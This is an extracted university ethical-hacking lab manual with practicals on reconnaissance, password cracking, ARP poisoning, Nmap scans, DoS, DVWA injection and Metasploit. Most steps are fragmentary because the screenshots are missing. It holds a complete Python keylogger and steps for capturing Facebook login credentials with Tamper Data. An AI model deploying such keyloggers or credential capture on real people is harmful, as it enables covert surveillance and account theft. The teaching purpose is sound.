Ethical hacking practical
Ethical hacking practical
MUMBAI UNIVERSITY
ETHICAL HACKING
LAB MANUAL
CERTIFICATE
DEPARTMENT OF COMPUTER SCIENCE
of B.Sc. (CS) Semester VI, Roll No. has successfully completed the practical’s in
the subject of Ethical Hacking as per the requirement of University of Mumbai in part fulfillment for
the completion of Degree of Bachelor of Science (Computer Science). It is also to certify that this is the
original work of the candidate done during the academic year 2024-2025.
H.O.D
DEPARTMENT OF C.S.
2
02
INDEX
SR
PRACTICAL NAME DATE SIGN
NO
.
1. Google and Whois Reconnaissance
Use Google search techniques to gather information about a specific target
or organization.
Utilize advanced search operators to refine search results and access hidden
information.
Perform Whois lookups to retrieve domain registration information and
gather details about the target's infrastructure.
2. Password Encryption and Cracking with CrypTool and Cain and Abel
Password Encryption and Decryption:
o Use CrypTool to encrypt passwords using the RC4 algorithm.
o Decrypt the encrypted passwords and verify the
original values.
Password Cracking and Wireless Network Password
Decoding:
o Use Cain and Abel to perform a dictionary attack on Windows account
passwords.
o Decode wireless network passwords using Cain and
Abel's capabilities
5. Network Traffic Capture and DoS Attack with Wireshark and Nemesy
Network Traffic Capture:
o Use Wireshark to capture network traffic on a specific network interface.
o Analyze the captured packets to extract relevant
information and
1
02
2
02
PRACTICAL NO 01
Aim: Use Google and Whois for Reconnaissance
3
02
4
02
Practical-2
Aim:
a) Use CrypTool to encrypt and decrypt passwords using RC4 algorithm
b) Use Cain and Abel for cracking Windows account password using Dictionary attack
and to decode wireless network passwords.
Steps:
1. Install CrypTool from https://www.cryptool.org/en/ct1-downloads.
2. Plain Text
5. Click Encrypt.
8. Click Decrypt.
5
02
b) Use Cain and Abel for cracking Windows account password using dictionary attack
and to decode wireless network password.
1. Open the software, click on Cracker tab >> Hash Calculator tool as shown in the image.
6
02
7
02
8
02
Practical-3
Aim: a) Run and analyze the output of following commands in Linux –
ifconfig, ping, netstat, traceroute.
b) Perform ARP Poisoning in Windows
a) Linux Commands:
1. ifconfig
2. netstat
9
02
3. ping
4. traceroute
10
02
b) ARP Poisoning
Steps:
1) Click on Sniffer tab.
2) Click on Start/Stop Sniffer and give range values and click okay.
11
02
5) Click on Add Button(1) and select your router and any IP.
12
02
6) Click on the IP and then click on the button shown in the image to start ARP
Poisoning.
13
02
Practical – 4
Aim: Use NMap scanner to perform port scanning of various forms – ACK, SYN, FIN,
NULL, XMAS.
NOTE: Install Nmap for windows and install it. After that open cmd and type “nmap” to
check if it is installed properly. Now type the below commands.
14
02
15
02
Practical-5
Aim: a) Use Wireshark (Sniffer) to capture network traffic and analyze
b) Use Nemesy to launch DoS attack
16
02
3. Right Click on the POST method >> Follow >> TCP stream.
17
02
18
02
Practical – 6
Aim: Simulate persistent cross-site scripting attack.
Steps:
1. Extract the DVWA zip file.
2. Copy the folder and paste it in Drive C: > xampp > htdocs
3. Rename the file as DVWA.
4. Go in the config file and rename the file as config.inc.php
5. Open chrome and search localhost/DVWA.
6. Click on create/reset database. The database will be created. Click on login.
19
02
9. Click on XSS (Stored) write the script and click on sign guestbook. The script will be
executed whenever the page is reloaded.
20
02
21
02
Practical – 7
Aim: Session impersonation using Firefox and Tamper Data add-on.
Steps:
1. Open Firefox
2. Go to tools > Add on > Extension
3. Search and install Temper Data.
4. Go to facebook login page.
5. Now click on tamper add on and start tampering the data.
6. Now enter the username and password in the facebook login page.
7. Your username and password is been captured using session impersonation.
22
02
23
02
24
02
15. Then click on OK and see the Data has been Tempered.
25
02
Practical – 8
Aim: Perform SQL injection attack.
Steps:
1. Extract the DVWA zip file.
2. Copy the folder and paste it in Drive C: > xampp > htdocs
3. Rename the file as DVWA.
4. Go in the config file and rename the file as config.inc.php
5. Open chrome and search localhost/DVWA.
6. Click on create/reset database. The database will be created. Click on login.
26
02
27
02
28
02
Practical – 9
Aim: Create a simple keylogger using python
Code:
from pynput.keyboard import Key, Listener
import logging
# if no name it gets into an empty string
log_dir = ""
# This is a basic logging function
logging.basicConfig(filename=(log_dir+"key_log.txt"), level=logging.DEBUG,
format='%(asctime)s:%(message)s:')
# This is from the library
def on_press(key):
logging.info(str(key))
# This says, listener is on
with Listener(on_press=on_press) as listener:
listener.join()
Output:
29
02
Practical – 10
Aim: Using Metasploit to exploit (Kali Linux).
Steps:
Boot kali linux in pendrive and open it in PC.
Open metasploit and type exit command to quit.
The directory will change to root@kali.
Type the following command.
30
02
31
02
32